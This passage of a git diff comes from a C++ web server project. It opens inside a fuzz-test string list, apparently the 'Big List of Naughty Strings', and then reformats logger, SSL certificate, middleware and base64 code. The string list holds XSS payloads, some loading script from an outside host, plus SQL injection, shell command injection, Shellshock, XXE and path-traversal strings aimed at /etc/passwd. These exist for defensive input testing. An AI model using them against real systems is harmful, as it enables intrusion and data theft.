id=\"fuzzelement1\">test</a>", + "<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", "`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>", + "`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>", + "`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>", + "`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>", + "`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>", + "`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>", "\"`'><script>\\x3Bjavascript:alert(1)</script>", "\"`'><script>\\x0Djavascript:alert(1)</script>", + "\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>", + "\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>", "\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>", + "\"`'><script>\\x09javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>", + "\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>", + "\"`'><script>\\x00javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>", + "\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>", "\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>", + "\"`'><script>\\x0Cjavascript:alert(1)</script>", "\"`'><script>\\x2Bjavascript:alert(1)</script>", + "\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>", "\"`'><script>-javascript:alert(1)</script>", + "\"`'><script>\\x0Ajavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>", + "\"`'><script>\\x7Ejavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>", + "\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>", + "\"`'><script>\\xC2\\x85javascript:alert(1)</script>", "\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>", + "\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>", + "\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>", + "\"`'><script>\\x21javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>", + "\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>", "\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>", + "\"`'><script>\\x0Bjavascript:alert(1)</script>", "\"`'><script>\\x20javascript:alert(1)</script>", "\"`'><script>\\xC2\\xA0javascript:alert(1)</script>", + "<img \\x00src=x onerror=\"alert(1)\">", "<img \\x47src=x onerror=\"javascript:alert(1)\">", "<img \\x11src=x onerror=\"javascript:alert(1)\">", + "<img \\x12src=x onerror=\"javascript:alert(1)\">", "<img\\x47src=x onerror=\"javascript:alert(1)\">", "<img\\x10src=x onerror=\"javascript:alert(1)\">", + "<img\\x13src=x onerror=\"javascript:alert(1)\">", "<img\\x32src=x onerror=\"javascript:alert(1)\">", "<img\\x47src=x onerror=\"javascript:alert(1)\">", + "<img\\x11src=x onerror=\"javascript:alert(1)\">", "<img \\x47src=x onerror=\"javascript:alert(1)\">", "<img \\x34src=x onerror=\"javascript:alert(1)\">", + "<img \\x39src=x onerror=\"javascript:alert(1)\">", "<img \\x00src=x onerror=\"javascript:alert(1)\">", "<img src\\x09=x onerror=\"javascript:alert(1)\">", + "<img src\\x10=x onerror=\"javascript:alert(1)\">", "<img src\\x13=x onerror=\"javascript:alert(1)\">", "<img src\\x32=x onerror=\"javascript:alert(1)\">", + "<img src\\x12=x onerror=\"javascript:alert(1)\">", "<img src\\x11=x onerror=\"javascript:alert(1)\">", "<img src\\x00=x onerror=\"javascript:alert(1)\">", + "<img src\\x47=x onerror=\"javascript:alert(1)\">", "<img src=x\\x09onerror=\"javascript:alert(1)\">", "<img src=x\\x10onerror=\"javascript:alert(1)\">", + "<img src=x\\x11onerror=\"javascript:alert(1)\">", "<img src=x\\x12onerror=\"javascript:alert(1)\">", "<img src=x\\x13onerror=\"javascript:alert(1)\">", + "<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">", "<img src=x onerror=\\x09\"javascript:alert(1)\">", "<img src=x onerror=\\x10\"javascript:alert(1)\">", + "<img src=x onerror=\\x11\"javascript:alert(1)\">", "<img src=x onerror=\\x12\"javascript:alert(1)\">", "<img src=x onerror=\\x32\"javascript:alert(1)\">", + "<img src=x onerror=\\x00\"javascript:alert(1)\">", "<a href=javascript:javascript:alert(1)>XXX</a>", + "<img src=\"x` `<script>javascript:alert(1)</script>\"` `>", "<img src onerror /\" '\"= alt=javascript:alert(1)//\">", + "<title onpropertychange=javascript:alert(1)></title><title title=>", + "<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">", "<!--[if]><script>javascript:alert(1)</script -->", + "<!--[if<img src=x onerror=javascript:alert(1)//]> -->", "<script src=\"/\%(jscript)s\"></script>", "<script src=\"\\%(jscript)s\"></script>", + "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", "<IMG SRC=# onmouseover=\"alert('xxs')\">", + "<IMG SRC= onmouseover=\"alert('xxs')\">", "<IMG onmouseover=\"alert('xxs')\">", + "<IMG SRC=javascript:alert('XSS')>", + "<IMG " + "SRC=javascript:alert&#" + "0000040'XSS')>", + "<IMG SRC=javascript:alert('XSS')>", + "<IMG SRC=\"jav ascript:alert('XSS');\">", "<IMG SRC=\"jav	ascript:alert('XSS');\">", "<IMG SRC=\"jav
ascript:alert('XSS');\">", + "<IMG SRC=\"jav
ascript:alert('XSS');\">", "perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out", + "<IMG SRC=\"  javascript:alert('XSS');\">", "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", "<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>", + "<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >", "<SCRIPT SRC=//ha.ckers.org/.j>", "<IMG SRC=\"javascript:alert('XSS')\"", + "<iframe src=http://ha.ckers.org/scriptlet.html <", "\\\";alert('XSS');//", "<u oncopy=alert()> Copy me</u>", "<i onwheel=alert(1)> Scroll over me </i>", + "<plaintext>", "http://a/%%30%30", "</textarea><script>alert(123)</script>", + + // SQL Injection + // + // Strings which can cause a SQL injection if inputs are not sanitized + + "1;DROP TABLE users", "1'; DROP TABLE users-- 1", "' OR 1=1 -- 1", "' OR '1'='1", " ", "%", "_", + + // Server Code Injection + // + // Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153) + + "-", "--", "--version", "--help", "$USER", "/dev/null; touch /tmp/blns.fail ; echo", "`touch /tmp/blns.fail`", "$(touch /tmp/blns.fail)", + "@{[system \"touch /tmp/blns.fail\"]}", + + // Command Injection (Ruby) + // + // Strings which can call system commands within Ruby/Rails applications + + "eval(\"puts 'hello world'\")", "System(\"ls -al /\")", "`ls -al /`", "Kernel.exec(\"ls -al /\")", "Kernel.exit(1)", "%x('ls -al /')", + + // XXE Injection (XML) + // + // String which can reveal system files when parsed by a badly configured XML parser + + "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>", + + // Unwanted Interpolation + // + // Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or + //shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string. + + "$HOME", "$ENV{'HOME'}", "%d", "%s", "{0}", "%*.*s", "File:///", + + // File Inclusion + // + // Strings which can cause user to pull in files that should not be a part of a web server + + "../../../../../../../../../../../etc/passwd%00", "../../../../../../../../../../../etc/hosts", + + // Known CVEs and Vulnerabilities + // + // Strings that test for known vulnerabilities + + "() { 0; }; touch /tmp/blns.shellshock1.fail;", "() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }", "<<< %s(un='%s') = %u", "+++ATH0", + + // MSDOS/Windows Special Filenames + // + // Strings which are reserved characters in MSDOS/Windows + + "CON", "PRN", "AUX", "CLOCK$", "NUL", "A:", "ZZ:", "COM1", "LPT1", "LPT2", "LPT3", "COM2", "COM3", "COM4", + + // IRC specific strings + // + // Strings that may occur on IRC clients that make security products freak out + + "DCC SEND STARTKEYLOGGER 0 0 0", + + // Scunthorpe Problem + // + // Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem) + + "Scunthorpe General Hospital", "Penistone Community Church", "Lightwater Country Park", "Jimmy Clitheroe", "Horniman Museum", "shitake mushrooms", + "RomansInSussex.co.uk", "http://www.cum.qc.ca/", "Craig Cockburn, Software Specialist", "Linda Callahan", "Dr. Herman I. Libshitz", "magna cum laude", + "Super Bowl XXX", "medieval erection of parapets", "evaluate", "mocha", "expression", "Arsenal canal", "classic", "Tyson Gay", "Dick Van Dyke", "basement", + + // Human injection + // + // Strings which may cause human to reinterpret worldview + + "If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your " + "dream, but we hope it works. Please wake up, we miss you.", + + // Terminal escape codes + // + // Strings which punish the fools who use cat/type on this file + + "Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue", "But now...[20Cfor my greatest trick...[8m", + "The quick brown fox... [Beeeep]", + + // iOS Vulnerabilities + // + // Strings which crashed iMessage in various versions of iOS + + "Powerトマトマᄉムᄄマトマトᄉムᄄマᄆᄆヒ ¢ᆬᆪ ¢ᆬᆪh ¢ᆬᆪ " + "¢ᆬᆪ¥ニラ", + "゚マᄈ0゚フネᄌマ"};
\ No newline at end of file diff --git a/include/color_cout_g3_sink.hpp b/include/color_cout_g3_sink.hpp index cd98fac05d..a92bf9432e 100644 --- a/include/color_cout_g3_sink.hpp +++ b/include/color_cout_g3_sink.hpp @@ -1,26 +1,29 @@ #pragma once -namespace crow -{ - struct ColorCoutSink { - +namespace crow { +struct ColorCoutSink { // Linux xterm color // http://stackoverflow.com/questions/2616906/how-do-i-output-coloured-text-to-a-linux-terminal - enum FG_Color {YELLOW = 33, RED = 31, GREEN=32, WHITE = 97}; - - FG_Color GetColor(const LEVELS level) const { - if (level.value == WARNING.value) { return YELLOW; } - if (level.value == DEBUG.value) { return GREEN; } - if (g3::internal::wasFatal(level)) { return RED; } + enum FG_Color { YELLOW = 33, RED = 31, GREEN = 32, WHITE = 97 }; - return WHITE; + FG_Color GetColor(const LEVELS level) const { + if (level.value == WARNING.value) { + return YELLOW; } - - void ReceiveLogMessage(g3::LogMessageMover logEntry) { - auto level = logEntry.get()._level; - auto color = GetColor(level); - - std::cout << "\033[" << color << "m" - << logEntry.get().toString() << "\033[m"; + if (level.value == DEBUG.value) { + return GREEN; + } + if (g3::internal::wasFatal(level)) { + return RED; } - }; + + return WHITE; + } + + void ReceiveLogMessage(g3::LogMessageMover logEntry) { + auto level = logEntry.get()._level; + auto color = GetColor(level); + + std::cout << "\033[" << color << "m" << logEntry.get().toString() << "\033[m"; + } +}; }
\ No newline at end of file diff --git a/include/crow_g3_logger.hpp b/include/crow_g3_logger.hpp index e39269a579..a7e7d9ffbf 100644 --- a/include/crow_g3_logger.hpp +++ b/include/crow_g3_logger.hpp @@ -5,88 +5,70 @@ // but deletes the ILogHandler interface, as usage of that would be counter to the g3 // handler management, and would cause performance issues. - -#include <string> #include <cstdio> #include <cstdlib> #include <ctime> #include <iostream> #include <sstream> +#include <string> #include <g3log/g3log.hpp> #include <g3log/logworker.hpp> -namespace crow -{ - enum class LogLevel - { +namespace crow { +enum class LogLevel { #ifndef ERROR - DEBUG = 0, - INFO, - WARNING, - ERROR, - CRITICAL, + DEBUG = 0, + INFO, + WARNING, + ERROR, + CRITICAL, #endif - Debug = 0, - Info, - Warning, - Error, - Critical, - }; - - class logger { - - public: - - - logger(std::string prefix, LogLevel level) : level_(level) { - // no op, let g3 handle th log levels - - } - - // - template <typename T> - logger& operator<<(T const &value) { - - #ifdef CROW_ENABLE_LOGGING - if(level_ >= get_current_log_level()) { - stringstream_ << value; - } - #endif - return *this; - } + Debug = 0, + Info, + Warning, + Error, + Critical, +}; + +class logger { + public: + logger(std::string prefix, LogLevel level) : level_(level) { + // no op, let g3 handle th log levels + } + + // + template <typename T> + logger& operator<<(T const& value) { +#ifdef CROW_ENABLE_LOGGING + if (level_ >= get_current_log_level()) { + stringstream_ << value; + } +#endif + return *this; + } - // - static void setLogLevel(LogLevel level) { - get_log_level_ref() = level; - } + // + static void setLogLevel(LogLevel level) { get_log_level_ref() = level; } - static LogLevel get_current_log_level() { - return get_log_level_ref(); - } + static LogLevel get_current_log_level() { return get_log_level_ref(); } - private: - // - static LogLevel& get_log_level_ref() - { - static LogLevel current_level = (LogLevel)CROW_LOG_LEVEL; - return current_level; - } + private: + // + static LogLevel& get_log_level_ref() { + static LogLevel current_level = (LogLevel)CROW_LOG_LEVEL; + return current_level; + } - // - std::ostringstream stringstream_; - LogLevel level_; - }; + // + std::ostringstream stringstream_; + LogLevel level_; +}; } -#define CROW_LOG_CRITICAL \ - LOG(FATAL) -#define CROW_LOG_ERROR \ - LOG(WARNING) -#define CROW_LOG_WARNING \ - LOG(WARNING) -#define CROW_LOG_INFO \ - LOG(INFO) -#define CROW_LOG_DEBUG \ - LOG(DEBUG) +#define CROW_LOG_CRITICAL LOG(FATAL) +#define CROW_LOG_ERROR LOG(WARNING) +#define CROW_LOG_WARNING LOG(WARNING) +#define CROW_LOG_INFO LOG(INFO) +#define CROW_LOG_DEBUG LOG(DEBUG) diff --git a/include/ssl_key_handler.hpp b/include/ssl_key_handler.hpp index a658d9cb0e..69eae13dbb 100644 --- a/include/ssl_key_handler.hpp +++ b/include/ssl_key_handler.hpp @@ -11,172 +11,162 @@ #include <openssl/rsa.h> #include <openssl/ssl.h> -namespace ensuressl -{ +namespace ensuressl { static void init_openssl(void); static void cleanup_openssl(void); static EVP_PKEY *create_rsa_key(void); static void handle_openssl_error(void); -inline bool verify_openssl_key_cert(const std::string &filepath) -{ - bool private_key_valid = false; - bool cert_valid = false; - FILE *file = fopen(filepath.c_str(), "r"); - if (file != NULL){ - EVP_PKEY *pkey = PEM_read_PrivateKey(file, NULL, NULL, NULL); - int rc; - if (pkey) { - int type = EVP_PKEY_type(pkey->type); - switch (type) { - case EVP_PKEY_RSA: - case EVP_PKEY_RSA2: { - RSA *rsa = EVP_PKEY_get1_RSA(pkey); - rc = RSA_check_key(rsa); - if (rc == 1) { - private_key_valid = true; - } - - //RSA_free(rsa); - - break; - } - default: - break; - } - - if (private_key_valid) { - X509 *x509 = PEM_read_X509(file, NULL, NULL, NULL); - unsigned long err = ERR_get_error(); - - rc = X509_verify(x509, pkey); - err = ERR_get_error(); - if (err == 0 && rc == 1) { - cert_valid = true; - } - } - - EVP_PKEY_free(pkey); +inline bool verify_openssl_key_cert(const std::string &filepath) { + bool private_key_valid = false; + bool cert_valid = false; + FILE *file = fopen(filepath.c_str(), "r"); + if (file != NULL) { + EVP_PKEY *pkey = PEM_read_PrivateKey(file, NULL, NULL, NULL); + int rc; + if (pkey) { + int type = EVP_PKEY_type(pkey->type); + switch (type) { + case EVP_PKEY_RSA: + case EVP_PKEY_RSA2: { + RSA *rsa = EVP_PKEY_get1_RSA(pkey); + rc = RSA_check_key(rsa); + if (rc == 1) { + private_key_valid = true; + } + + // RSA_free(rsa); + + break; } - fclose(file); + default: + break; + } + + if (private_key_valid) { + X509 *x509 = PEM_read_X509(file, NULL, NULL, NULL); + unsigned long err = ERR_get_error(); + + rc = X509_verify(x509, pkey); + err = ERR_get_error(); + if (err == 0 && rc == 1) { + cert_valid = true; + } + } + + EVP_PKEY_free(pkey); } - return cert_valid; + fclose(file); + } + return cert_valid; } -inline void generate_ssl_certificate(const std::string &filepath) -{ - EVP_PKEY *pPrivKey = NULL; - FILE *pFile = NULL; - init_openssl(); - - pPrivKey = create_rsa_key(); - - // Use this code to directly generate a certificate - X509 *x509; - x509 = X509_new(); - if (x509) { - // TODO get actually random int - ASN1_INTEGER_set(X509_get_serialNumber(x509), 1584); - - // not before this moment - X509_gmtime_adj(X509_get_notBefore(x509), 0); - // Cert is valid for 10 years - X509_gmtime_adj(X509_get_notAfter(x509), 60L * 60L * 24L * 365L * 10L); - - // set the public key to the key we just generated - X509_set_pubkey(x509, pPrivKey); - - // Get the subject name - X509_NAME *name; - name = X509_get_subject_name(x509); - - X509_NAME_add_entry_by_txt(name, "C", MBSTRING_ASC, (unsigned char *)"US", -1, - -1, 0); - X509_NAME_add_entry_by_txt(name, "O", MBSTRING_ASC, - (unsigned char *)"Intel BMC", -1, -1, 0); - X509_NAME_add_entry_by_txt(name, "CN", MBSTRING_ASC, - (unsigned char *)"testhost", -1, -1, 0); - // set the CSR options - X509_set_issuer_name(x509, name); - - // Sign the certificate with our private key - X509_sign(x509, pPrivKey, EVP_sha256()); - - pFile = fopen(filepath.c_str(), "wt"); - - if (pFile) { - PEM_write_PrivateKey(pFile, pPrivKey, NULL, NULL, 0, 0, NULL); - PEM_write_X509(pFile, x509); - fclose(pFile); - pFile = NULL; - } +inline void generate_ssl_certificate(const std::string &filepath) { + EVP_PKEY *pPrivKey = NULL; + FILE *pFile = NULL; + init_openssl(); - X509_free(x509); - } + pPrivKey = create_rsa_key(); + + // Use this code to directly generate a certificate + X509 *x509; + x509 = X509_new(); + if (x509) { + // TODO get actually random int + ASN1_INTEGER_set(X509_get_serialNumber(x509), 1584); + + // not before this moment + X509_gmtime_adj(X509_get_notBefore(x509), 0); + // Cert is valid for 10 years + X509_gmtime_adj(X509_get_notAfter(x509), 60L * 60L * 24L * 365L * 10L); + + // set the public key to the key we just generated + X509_set_pubkey(x509, pPrivKey); + + // Get the subject name + X509_NAME *name; + name = X509_get_subject_name(x509); + + X509_NAME_add_entry_by_txt(name, "C", MBSTRING_ASC, (unsigned char *)"US", -1, -1, 0); + X509_NAME_add_entry_by_txt(name, "O", MBSTRING_ASC, (unsigned char *)"Intel BMC", -1, -1, 0); + X509_NAME_add_entry_by_txt(name, "CN", MBSTRING_ASC, (unsigned char *)"testhost", -1, -1, 0); + // set the CSR options + X509_set_issuer_name(x509, name); + + // Sign the certificate with our private key + X509_sign(x509, pPrivKey, EVP_sha256()); - if (pPrivKey) { - EVP_PKEY_free(pPrivKey); - pPrivKey = NULL; + pFile = fopen(filepath.c_str(), "wt"); + + if (pFile) { + PEM_write_PrivateKey(pFile, pPrivKey, NULL, NULL, 0, 0, NULL); + PEM_write_X509(pFile, x509); + fclose(pFile); + pFile = NULL; } - //cleanup_openssl(); + X509_free(x509); + } + + if (pPrivKey) { + EVP_PKEY_free(pPrivKey); + pPrivKey = NULL; + } + + // cleanup_openssl(); } -EVP_PKEY *create_rsa_key(void) -{ - RSA *pRSA = NULL; - EVP_PKEY *pKey = NULL; - pRSA = RSA_generate_key(2048, RSA_3, NULL, NULL); - pKey = EVP_PKEY_new(); - if (pRSA && pKey && EVP_PKEY_assign_RSA(pKey, pRSA)) { - /* pKey owns pRSA from now */ - if (RSA_check_key(pRSA) <= 0) { - fprintf(stderr, "RSA_check_key failed.\n"); - handle_openssl_error(); - EVP_PKEY_free(pKey); - pKey = NULL; - } - } else { - handle_openssl_error(); - if (pRSA) { - RSA_free(pRSA); - pRSA = NULL; - } - if (pKey) { - EVP_PKEY_free(pKey); - pKey = NULL; - } +EVP_PKEY *create_rsa_key(void) { + RSA *pRSA = NULL; + EVP_PKEY *pKey = NULL; + pRSA = RSA_generate_key(2048, RSA_3, NULL, NULL); + pKey = EVP_PKEY_new(); + if (pRSA && pKey && EVP_PKEY_assign_RSA(pKey, pRSA)) { + /* pKey owns pRSA from now */ + if (RSA_check_key(pRSA) <= 0) { + fprintf(stderr, "RSA_check_key failed.\n"); + handle_openssl_error(); + EVP_PKEY_free(pKey); + pKey = NULL; + } + } else { + handle_openssl_error(); + if (pRSA) { + RSA_free(pRSA); + pRSA = NULL; } - return pKey; + if (pKey) { + EVP_PKEY_free(pKey); + pKey = NULL; + } + } + return pKey; } -void init_openssl(void) -{ - if (SSL_library_init()) { - SSL_load_error_strings(); - OpenSSL_add_all_algorithms(); - RAND_load_file("/dev/urandom", 1024); - } else - exit(EXIT_FAILURE); +void init_openssl(void) { + if (SSL_library_init()) { + SSL_load_error_strings(); + OpenSSL_add_all_algorithms(); + RAND_load_file("/dev/urandom", 1024); + } else + exit(EXIT_FAILURE); } -void cleanup_openssl(void) -{ - CRYPTO_cleanup_all_ex_data(); - ERR_free_strings(); - ERR_remove_thread_state(0); - EVP_cleanup(); +void cleanup_openssl(void) { + CRYPTO_cleanup_all_ex_data(); + ERR_free_strings(); + ERR_remove_thread_state(0); + EVP_cleanup(); } void handle_openssl_error(void) { ERR_print_errors_fp(stderr); } -inline void ensure_openssl_key_present_and_valid(const std::string &filepath) -{ - bool pem_file_valid = false; +inline void ensure_openssl_key_present_and_valid(const std::string &filepath) { + bool pem_file_valid = false; - pem_file_valid = verify_openssl_key_cert(filepath); + pem_file_valid = verify_openssl_key_cert(filepath); - if (!pem_file_valid) { - generate_ssl_certificate(filepath); - } + if (!pem_file_valid) { + generate_ssl_certificate(filepath); + } } }
\ No newline at end of file diff --git a/include/token_authorization_middleware.hpp b/include/token_authorization_middleware.hpp index 801c75f91b..7e8e5031ac 100644 --- a/include/token_authorization_middleware.hpp +++ b/include/token_authorization_middleware.hpp @@ -3,21 +3,19 @@ #include <crow/http_request.h> #include <crow/http_response.h> -namespace crow -{ - struct TokenAuthorizationMiddleware { +namespace crow { +struct TokenAuthorizationMiddleware { + struct context { + std::unordered_map<std::string, std::string> cookie_sessions; + std::unordered_map<std::string, std::string> cookies_to_push_to_client; - struct context { - std::unordered_map<std::string, std::string> cookie_sessions; - std::unordered_map<std::string, std::string> cookies_to_push_to_client; + std::string get_cookie(const std::string& key); - std::string get_cookie(const std::string& key); + void set_cookie(const std::string& key, const std::string& value); + }; - void set_cookie(const std::string& key, const std::string& value); - }; + void before_handle(crow::request& req, response& res, context& ctx); - void before_handle(crow::request& req, response& res, context& ctx); - - void after_handle(request& req, response& res, context& ctx); - }; + void after_handle(request& req, response& res, context& ctx); +}; }
\ No newline at end of file diff --git a/include/webassets.hpp b/include/webassets.hpp index 68a6c4a36b..b2bda68869 100644 --- a/include/webassets.hpp +++ b/include/webassets.hpp @@ -2,18 +2,16 @@ #include <string> +#include <crow/app.h> #include <crow/http_request.h> #include <crow/http_response.h> -#include <crow/app.h> -//TODO this is wrong. file handler shouldn't care about middlewares -#include "token_authorization_middleware.hpp" +// TODO this is wrong. file handler shouldn't care about middlewares #include <crow/routing.h> +#include "token_authorization_middleware.hpp" -namespace crow -{ -namespace webassets -{ - void request_routes(crow::App<crow::TokenAuthorizationMiddleware>& app); +namespace crow { +namespace webassets { +void request_routes(crow::App<crow::TokenAuthorizationMiddleware>& app); } }
\ No newline at end of file diff --git a/src/base64.cpp b/src/base64.cpp index 259288757b..001a467899 100644 --- a/src/base64.cpp +++ b/src/base64.cpp @@ -1,81 +1,67 @@ #include <base64.hpp> #include <cassert> -namespace base64 -{ -bool base64_encode(const gsl::cstring_span<> &input, std::string &output) -{ - static const char encoding_data[] = - "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; - - unsigned int input_length = input.size(); - - // allocate space for output string - output.clear(); - output.reserve(((input_length + 2) / 3) * 4); - - // for each 3-bytes sequence from the input, extract 4 6-bits sequences and - // encode using - // encoding_data lookup table. - // if input do not contains enough chars to complete 3-byte sequence,use pad - // char '=' - for (unsigned int i = 0; i < input_length; i++) { - int base64code0 = 0; - int base64code1 = 0; - int base64code2 = 0; - int base64code3 = 0; - - base64code0 = (input[i] >> 2) & 0x3f; // 1-byte 6 bits - output += encoding_data[base64code0]; - base64code1 = (input[i] << 4) & 0x3f; // 1-byte 2 bits + - - if (++i < input_length) { - base64code1 |= (input[i] >> 4) & 0x0f; // 2-byte 4 bits - output += encoding_data[base64code1]; - base64code2 = (input[i] << 2) & 0x3f; // 2-byte 4 bits + - - if (++i < input_length) { - base64code2 |= (input[i] >> 6) & 0x03; // 3-byte 2 bits - base64code3 = input[i] & 0x3f; // 3-byte 6 bits - output += encoding_data[base64code2]; - output += encoding_data[base64code3]; - } else { - output += encoding_data[base64code2]; - output += '='; - } - } else { - output += encoding_data[base64code1]; - output += '='; - output += '='; - } +namespace base64 { +bool base64_encode(const gsl::cstring_span<> &input, std::string &output) { + static const char encoding_data[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; + + unsigned int input_length = input.size(); + + // allocate space for output string + output.clear(); + output.reserve(((input_length + 2) / 3) * 4); + + // for each 3-bytes sequence from the input, extract 4 6-bits sequences and + // encode using + // encoding_data lookup table. + // if input do not contains enough chars to complete 3-byte sequence,use pad + // char '=' + for (unsigned int i = 0; i < input_length; i++) { + int base64code0 = 0; + int base64code1 = 0; + int base64code2 = 0; + int base64code3 = 0; + + base64code0 = (input[i] >> 2) & 0x3f; // 1-byte 6 bits + output += encoding_data[base64code0]; + base64code1 = (input[i] << 4) & 0x3f; // 1-byte 2 bits + + + if (++i < input_length) { + base64code1 |= (input[i] >> 4) & 0x0f; // 2-byte 4 bits + output += encoding_data[base64code1]; + base64code2 = (input[i] << 2) & 0x3f; // 2-byte 4 bits + + + if (++i < input_length) { + base64code2 |= (input[i] >> 6) & 0x03; // 3-byte 2 bits + base64code3 = input[i] & 0x3f; // 3-byte 6 bits + output += encoding_data[base64code2]; + output += encoding_data[base64code3]; + } else { + output += encoding_data[base64code2]; + output += '='; + } + } else { + output += encoding_data[base64code1]; + output += '='; + output += '='; } + } - return true; + return true; } - -bool base64_decode(const gsl::cstring_span<> &input, std::string &output) -{ +bool base64_decode(const gsl::cstring_span<> &input, std::string &output) { static const char nop = -1; static const char decoding_data[] = { - nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, - nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, - nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, 62, nop, - nop, nop, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, nop, nop, - nop, nop, nop, nop, nop, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, - 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, - 25, nop, nop, nop, nop, nop, nop, 26, 27, 28, 29, 30, 31, 32, 33, - 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, - 49, 50, 51, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, - nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, - nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, - nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, - nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, - nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, - nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, - nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, - nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, - nop}; + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, 